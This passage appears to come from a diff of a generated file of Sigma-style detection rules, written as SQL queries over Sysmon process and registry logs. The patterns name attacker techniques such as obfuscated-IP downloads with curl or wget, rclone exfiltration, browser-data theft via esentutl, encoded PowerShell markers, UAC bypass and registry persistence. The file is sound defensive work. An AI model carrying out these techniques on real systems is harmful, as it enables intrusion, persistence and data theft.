'%\\\\CLSID\\\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{B4132098-7A03-423D-9463-163CB07C151F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{eec97550-47a9-11cf-b952-00aa0051fe20}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + ], + "filename": "registry_set_persistence_ifilter.yml" + }, + { + "title": "Change Winevt Event Access Permission Via Registry", + "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", + "status": "experimental", + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (Details LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR Details LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR Details LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_powertool.yml" + "filename": "registry_set_change_winevt_channelaccess.yml" }, { - "title": "Obfuscated IP Download", - "id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", + "title": "Potential Persistence Via Visual Studio Tools for Office", + "id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", "status": "experimental", - "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery" + "attack.t1137.006", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate Addin Installation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\') AND ((CommandLine LIKE '%//0x%' ESCAPE '\\' OR CommandLine LIKE '%.0x%' ESCAPE '\\' OR CommandLine LIKE '%.00x%' ESCAPE '\\') OR (CommandLine LIKE '%http://\\%%' ESCAPE '\\' AND CommandLine LIKE '%\\%2e%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Word\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Excel\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Powerpoint\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\VSTO\\\\Security\\\\Inclusion\\\\%' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\integrator.exe' ESCAPE '\\' OR Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_obfuscated_ip_download.yml" + "filename": "registry_set_persistence_office_vsto.yml" }, { - "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", - "id": "56c217c3-2de2-479b-990f-5c109ba8458f", - "status": "test", - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "author": "Markus Neis, @Karneades", + "title": "Potential Persistence Via Excel Add-in - Registry", + "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", + "status": "experimental", + "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "author": "frack113", "tags": [ - "attack.execution", "attack.persistence", - "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" + "attack.t1137.006" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND Details LIKE '/R %' ESCAPE '\\' AND Details LIKE '%.xll' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" + "filename": "registry_set_persistence_xll.yml" }, { - "title": "JSC Convert Javascript To Executable", - "id": "52788a70-f1da-40dd-8fbd-73b5865d6568", + "title": "Potential Persistence Via Custom Protocol Handler", + "id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", "status": "experimental", - "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", - "author": "frack113", + "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate applications registering a new custom protocol handler" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\jsc.exe' ESCAPE '\\' AND CommandLine LIKE '%.js%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCR\\\\%' ESCAPE '\\' AND Details LIKE 'URL:%' ESCAPE '\\') AND NOT ((Details LIKE 'URL:ms-%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_jsc.yml" + "filename": "registry_set_persistence_custom_protocol_handler.yml" }, { - "title": "WScript or CScript Dropper", - "id": "cea72823-df4d-4567-950c-0b579eaf0846", - "status": "test", - "description": "Detects wscript/cscript executions of scripts located in user directories", - "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "title": "Add Debugger Entry To Hangs Key For Persistence", + "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "status": "experimental", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.persistence" ], "falsepositives": [ - "Winzip", - "Other self-extractors" + "This value is not set by default but could be rarly used by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\winzip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_script_dropper.yml" + "filename": "registry_set_hangs_debugger_persistence.yml" }, { - "title": "PUA - Rclone Execution", - "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", - "status": "experimental", - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "title": "Suspicious Environment Variable Has Been Registered", + "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", + "status": "test", + "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (Details IN ('powershell', 'pwsh') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR Details LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR Details LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR Details LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%SW52b2tlL%' ESCAPE '\\' OR Details LIKE '%ludm9rZS%' ESCAPE '\\' OR Details LIKE '%JbnZva2Ut%' ESCAPE '\\' OR Details LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR Details LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR Details LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (Details LIKE 'SUVY%' ESCAPE '\\' OR Details LIKE 'SQBFAF%' ESCAPE '\\' OR Details LIKE 'SQBuAH%' ESCAPE '\\' OR Details LIKE 'cwBhA%' ESCAPE '\\' OR Details LIKE 'aWV4%' ESCAPE '\\' OR Details LIKE 'aQBlA%' ESCAPE '\\' OR Details LIKE 'R2V0%' ESCAPE '\\' OR Details LIKE 'dmFy%' ESCAPE '\\' OR Details LIKE 'dgBhA%' ESCAPE '\\' OR Details LIKE 'dXNpbm%' ESCAPE '\\' OR Details LIKE 'H4sIA%' ESCAPE '\\' OR Details LIKE 'Y21k%' ESCAPE '\\' OR Details LIKE 'cABhAH%' ESCAPE '\\' OR Details LIKE 'Qzpc%' ESCAPE '\\' OR Details LIKE 'Yzpc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_rclone_execution.yml" + "filename": "registry_set_suspicious_env_variables.yml" }, { - "title": "Findstr Launching .lnk File", - "id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "title": "DNS-over-HTTPS Enabled by Registry", + "id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", "status": "test", - "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", - "author": "Trent Liffick", + "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", + "author": "Austin Songer", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1202", - "attack.t1027.003" + "attack.t1140", + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode' ESCAPE '\\' AND Details = 'secure') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\\\\Enabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" ], - "filename": "proc_creation_win_findstr_lnk.yml" + "filename": "registry_set_dns_over_https_enabled.yml" }, { - "title": "Execution of Powershell Script in Public Folder", - "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "title": "Potential Persistence Via Outlook Home Page", + "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "status": "experimental", - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects potential persistence activity via outlook home pages.", + "author": "Tobias Michalski (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1112" + ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_public_folder.yml" + "filename": "registry_set_persistence_outlook_homepage.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher", - "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "title": "Outlook Security Settings Updated - Registry", + "id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", "status": "test", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects changes to the registry values related to outlook security settings", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" + "filename": "registry_set_office_outlook_security_settings.yml" }, { - "title": "Uncommon One Time Only Scheduled Task At 00:00", - "id": "970823b7-273b-460a-8afc-3a6811998529", + "title": "ServiceDll Hijack", + "id": "612e47e9-8a59-43a6-b404-f48683f45bd6", "status": "experimental", - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "author": "pH-T (Nextron Systems)", + "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", + "author": "frack113", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], "falsepositives": [ - "Software installation" + "Administrative scripts", + "Installation of a service" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Parameters\\\\ServiceDll' ESCAPE '\\') AND NOT ((Details LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\ServiceDll' ESCAPE '\\' AND Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" + "filename": "registry_set_servicedll_hijack.yml" }, { - "title": "Esentutl Steals Browser Information", - "id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", - "status": "experimental", - "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", - "author": "frack113", + "title": "UAC Bypass Using Windows Media Player - Registry", + "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "status": "test", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1005" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName = 'esentutl.exe') AND (CommandLine LIKE '%/r%' ESCAPE '\\' OR CommandLine LIKE '%-r%' ESCAPE '\\') AND CommandLine LIKE '%\\\\Windows\\\\WebCache%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND Details = 'Binary Data')" ], - "filename": "proc_creation_win_esentutl_webcache.yml" + "filename": "registry_set_uac_bypass_wmp.yml" }, { - "title": "7Zip Compressing Dump Files", - "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", + "title": "Scheduled TaskCache Change by Uncommon Program", + "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", "status": "experimental", - "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "author": "Syed Hasan (@syedhasan009)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (Image LIKE 